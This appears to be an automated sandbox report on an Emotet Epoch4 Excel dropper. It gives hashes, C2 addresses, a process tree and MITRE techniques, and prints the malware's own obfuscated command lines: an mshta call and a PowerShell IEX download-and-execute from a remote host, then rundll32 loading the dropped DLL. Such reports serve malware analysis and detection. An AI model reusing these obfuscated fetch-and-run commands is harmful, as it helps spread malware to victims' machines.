emotet | d3555d24f820403e1e49c53898a3c54f58077c83bd4738ad9a0e2210d457baae

General

Target

EHZ816141086RS.xls
Size

47KB
MD5

b297dd00c8d7b450371f60b877a4e4a0
SHA1

95e435fcfff850f3a176f43517344101c6eee845
SHA256

d3555d24f820403e1e49c53898a3c54f58077c83bd4738ad9a0e2210d457baae
SHA512

a4a84bc4784c0461a712622db68524a4a3eb5da176b4d1b18c87fcb65c6bc33498fad801e4803aa53f7ac00bb724bfcd1899710f27c497936eec0c5f54750317

Score

10^/10

emotet epoch4 banker suricata trojan

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

http://91.240.118.168/vvv/ppp/fe.html

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://91.240.118.168/vvv/ppp/fe.png

Extracted

Family

emotet

Botnet

Epoch4

C2

51.15.4.22:443

173.214.173.220:8080

212.237.5.209:443

192.254.71.210:443

216.158.226.206:443

162.243.175.63:443

212.24.98.99:8080

58.227.42.236:80

45.118.115.99:8080

104.251.214.46:8080

185.157.82.209:8080

46.55.222.11:443

188.40.137.206:8080

81.0.236.90:443

103.75.201.2:443

129.232.188.93:443

195.154.133.20:443

159.8.59.82:8080

79.172.212.216:8080

138.185.72.26:8080

eck1.plain

ecs1.plain

Signatures

Emotet
Emotet is a trojan that is primarily spread through spam emails.
trojan banker emotet

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

CMD.EXE

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	1292	2732	CMD.EXE	EXCEL.EXE

suricata: ET MALWARE W32/Emotet CnC Beacon 3
suricata: ET MALWARE W32/Emotet CnC Beacon 3
suricata
Blocklisted process makes network request 5 IoCs

Processes:

mshta.exepowershell.exerundll32.exe

flow pid process

30 1184 mshta.exe
38 1788 powershell.exe
40 1788 powershell.exe
47 2448 rundll32.exe
48 2448 rundll32.exe
Downloads MZ/PE file
Loads dropped DLL 2 IoCs

Processes:

rundll32.exerundll32.exe

pid process

1596 rundll32.exe
2208 rundll32.exe
Drops file in System32 directory 1 IoCs

Processes:

rundll32.exe

description ioc process

File opened for modification C:\Windows\SysWOW64\Nifktanavwovxcda\zmnio.puq rundll32.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

4012 1184 WerFault.exe mshta.exe

flow	pid	process
30	1184	mshta.exe
38	1788	powershell.exe
40	1788	powershell.exe
47	2448	rundll32.exe
48	2448	rundll32.exe

pid	process
1596	rundll32.exe
2208	rundll32.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\Nifktanavwovxcda\zmnio.puq	rundll32.exe

pid	pid_target	process	target process
4012	1184	WerFault.exe	mshta.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid process

2732 EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 19 IoCs

Processes:

powershell.exeWerFault.exerundll32.exe

pid	process
1788	powershell.exe
1788	powershell.exe
4012	WerFault.exe
4012	WerFault.exe
4012	WerFault.exe
4012	WerFault.exe
4012	WerFault.exe
4012	WerFault.exe
4012	WerFault.exe
4012	WerFault.exe
4012	WerFault.exe
4012	WerFault.exe
4012	WerFault.exe
4012	WerFault.exe
4012	WerFault.exe
4012	WerFault.exe
1788	powershell.exe
2448	rundll32.exe
2448	rundll32.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exeWerFault.exe

description pid process

Token: SeDebugPrivilege 1788 powershell.exe
Token: SeDebugPrivilege 4012 WerFault.exe

description	pid	process
Token: SeDebugPrivilege	1788	powershell.exe
Token: SeDebugPrivilege	4012	WerFault.exe

Suspicious use of SetWindowsHookEx 13 IoCs

Processes:

EXCEL.EXE

pid	process
2732	EXCEL.EXE
2732	EXCEL.EXE
2732	EXCEL.EXE
2732	EXCEL.EXE
2732	EXCEL.EXE
2732	EXCEL.EXE
2732	EXCEL.EXE
2732	EXCEL.EXE
2732	EXCEL.EXE
2732	EXCEL.EXE
2732	EXCEL.EXE
2732	EXCEL.EXE
2732	EXCEL.EXE

Suspicious use of WriteProcessMemory 20 IoCs

Processes:

EXCEL.EXECMD.EXEmshta.exepowershell.execmd.exerundll32.exerundll32.exerundll32.exe

description	pid	process	target process
PID 2732 wrote to memory of 1292	2732	EXCEL.EXE	CMD.EXE
PID 2732 wrote to memory of 1292	2732	EXCEL.EXE	CMD.EXE
PID 1292 wrote to memory of 1184	1292	CMD.EXE	mshta.exe
PID 1292 wrote to memory of 1184	1292	CMD.EXE	mshta.exe
PID 1184 wrote to memory of 1788	1184	mshta.exe	powershell.exe
PID 1184 wrote to memory of 1788	1184	mshta.exe	powershell.exe
PID 1788 wrote to memory of 1368	1788	powershell.exe	cmd.exe
PID 1788 wrote to memory of 1368	1788	powershell.exe	cmd.exe
PID 1368 wrote to memory of 1596	1368	cmd.exe	rundll32.exe
PID 1368 wrote to memory of 1596	1368	cmd.exe	rundll32.exe
PID 1368 wrote to memory of 1596	1368	cmd.exe	rundll32.exe
PID 1596 wrote to memory of 2208	1596	rundll32.exe	rundll32.exe
PID 1596 wrote to memory of 2208	1596	rundll32.exe	rundll32.exe
PID 1596 wrote to memory of 2208	1596	rundll32.exe	rundll32.exe
PID 2208 wrote to memory of 1632	2208	rundll32.exe	rundll32.exe
PID 2208 wrote to memory of 1632	2208	rundll32.exe	rundll32.exe
PID 2208 wrote to memory of 1632	2208	rundll32.exe	rundll32.exe
PID 1632 wrote to memory of 2448	1632	rundll32.exe	rundll32.exe
PID 1632 wrote to memory of 2448	1632	rundll32.exe	rundll32.exe
PID 1632 wrote to memory of 2448	1632	rundll32.exe	rundll32.exe

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\EHZ816141086RS.xls"
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2732

C:\Windows\SYSTEM32\CMD.EXE
CMD.EXE /c ms^hta http://91.2^40.118.1^68/vvv/ppp/f^e.ht^m^l
2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1292

C:\Windows\system32\mshta.exe
mshta http://91.240.118.168/vvv/ppp/fe.html
3⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:1184

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/vvv/ppp/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1788

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll,BBDD
5⤵
- Suspicious use of WriteProcessMemory
PID:1368

C:\Windows\SysWow64\rundll32.exe
C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll,BBDD
6⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1596

C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\QWER.dll",DllRegisterServer
7⤵
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:2208

C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Nifktanavwovxcda\zmnio.puq",LkVHpq
8⤵
- Suspicious use of WriteProcessMemory
PID:1632

C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Nifktanavwovxcda\zmnio.puq",DllRegisterServer
9⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
PID:2448

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1184 -s 1644
4⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4012

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

3

T1082

Query Registry

2

T1012

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\QWER.dll
MD5
4739fcdd312a0287b93fe1e968b2aafe

SHA1
f2aa748a0bf5f52e1919cb3b9e24ed5b65701a71

SHA256
b7d873fd9a5c897cd22f36869f7c2fa335de5b14c898c86511c4bc7c7e0f2748

SHA512
32a120e8170a09dd5313f057c9095cc49d57314b482e1f072ace7bdcf7c2c9d9574bb3a8ca6ba2ec8b729160051d5a7d393fcdb8c31455b022a5f4fe25247f76

Download Submit
\ProgramData\QWER.dll
MD5
4739fcdd312a0287b93fe1e968b2aafe

SHA1
f2aa748a0bf5f52e1919cb3b9e24ed5b65701a71

SHA256
b7d873fd9a5c897cd22f36869f7c2fa335de5b14c898c86511c4bc7c7e0f2748

SHA512
32a120e8170a09dd5313f057c9095cc49d57314b482e1f072ace7bdcf7c2c9d9574bb3a8ca6ba2ec8b729160051d5a7d393fcdb8c31455b022a5f4fe25247f76

Download Submit
\ProgramData\QWER.dll
MD5
4739fcdd312a0287b93fe1e968b2aafe

SHA1
f2aa748a0bf5f52e1919cb3b9e24ed5b65701a71

SHA256
b7d873fd9a5c897cd22f36869f7c2fa335de5b14c898c86511c4bc7c7e0f2748

SHA512
32a120e8170a09dd5313f057c9095cc49d57314b482e1f072ace7bdcf7c2c9d9574bb3a8ca6ba2ec8b729160051d5a7d393fcdb8c31455b022a5f4fe25247f76

Download Submit
memory/1788-277-0x0000016A229D0000-0x0000016A229F2000-memory.dmp

Filesize
136KB

Download
memory/1788-315-0x0000016A3AD43000-0x0000016A3AD45000-memory.dmp

Filesize
8KB

Download
memory/1788-403-0x0000016A3AD46000-0x0000016A3AD48000-memory.dmp

Filesize
8KB

Download
memory/1788-329-0x0000016A3B360000-0x0000016A3B3D6000-memory.dmp

Filesize
472KB

Download
memory/1788-311-0x0000016A3AD40000-0x0000016A3AD42000-memory.dmp

Filesize
8KB

Download
memory/1788-298-0x0000016A3ACE0000-0x0000016A3AD1C000-memory.dmp

Filesize
240KB

Download
memory/2208-598-0x00000000048B0000-0x00000000048D5000-memory.dmp

Filesize
148KB

Download
memory/2208-611-0x0000000005370000-0x0000000005395000-memory.dmp

Filesize
148KB

Download
memory/2208-609-0x00000000051D0000-0x00000000051F5000-memory.dmp

Filesize
148KB

Download
memory/2208-607-0x0000000005170000-0x0000000005195000-memory.dmp

Filesize
148KB

Download
memory/2208-605-0x0000000005110000-0x0000000005135000-memory.dmp

Filesize
148KB

Download
memory/2208-603-0x0000000004FB0000-0x0000000004FD5000-memory.dmp

Filesize
148KB

Download
memory/2208-601-0x0000000004DE0000-0x0000000004E05000-memory.dmp

Filesize
148KB

Download
memory/2448-617-0x0000000003480000-0x00000000034A5000-memory.dmp

Filesize
148KB

Download
memory/2448-619-0x0000000004E80000-0x0000000004EA5000-memory.dmp

Filesize
148KB

Download
memory/2732-115-0x00007FFD79DC0000-0x00007FFD79DD0000-memory.dmp

Filesize
64KB

Download
memory/2732-118-0x00007FFD79DC0000-0x00007FFD79DD0000-memory.dmp

Filesize
64KB

Download
memory/2732-128-0x00007FFD76670000-0x00007FFD76680000-memory.dmp

Filesize
64KB

Download
memory/2732-129-0x00007FFD76670000-0x00007FFD76680000-memory.dmp

Filesize
64KB

Download
memory/2732-121-0x00007FFD79DC0000-0x00007FFD79DD0000-memory.dmp

Filesize
64KB

Download
memory/2732-117-0x00007FFD79DC0000-0x00007FFD79DD0000-memory.dmp

Filesize
64KB

Download
memory/2732-116-0x00007FFD79DC0000-0x00007FFD79DD0000-memory.dmp

Filesize
64KB

Download
memory/2732-663-0x00007FFD79DC0000-0x00007FFD79DD0000-memory.dmp

Filesize
64KB

Download
memory/2732-664-0x00007FFD79DC0000-0x00007FFD79DD0000-memory.dmp

Filesize
64KB

Download
memory/2732-666-0x00007FFD79DC0000-0x00007FFD79DD0000-memory.dmp

Filesize
64KB

Download
memory/2732-665-0x00007FFD79DC0000-0x00007FFD79DD0000-memory.dmp

Filesize
64KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads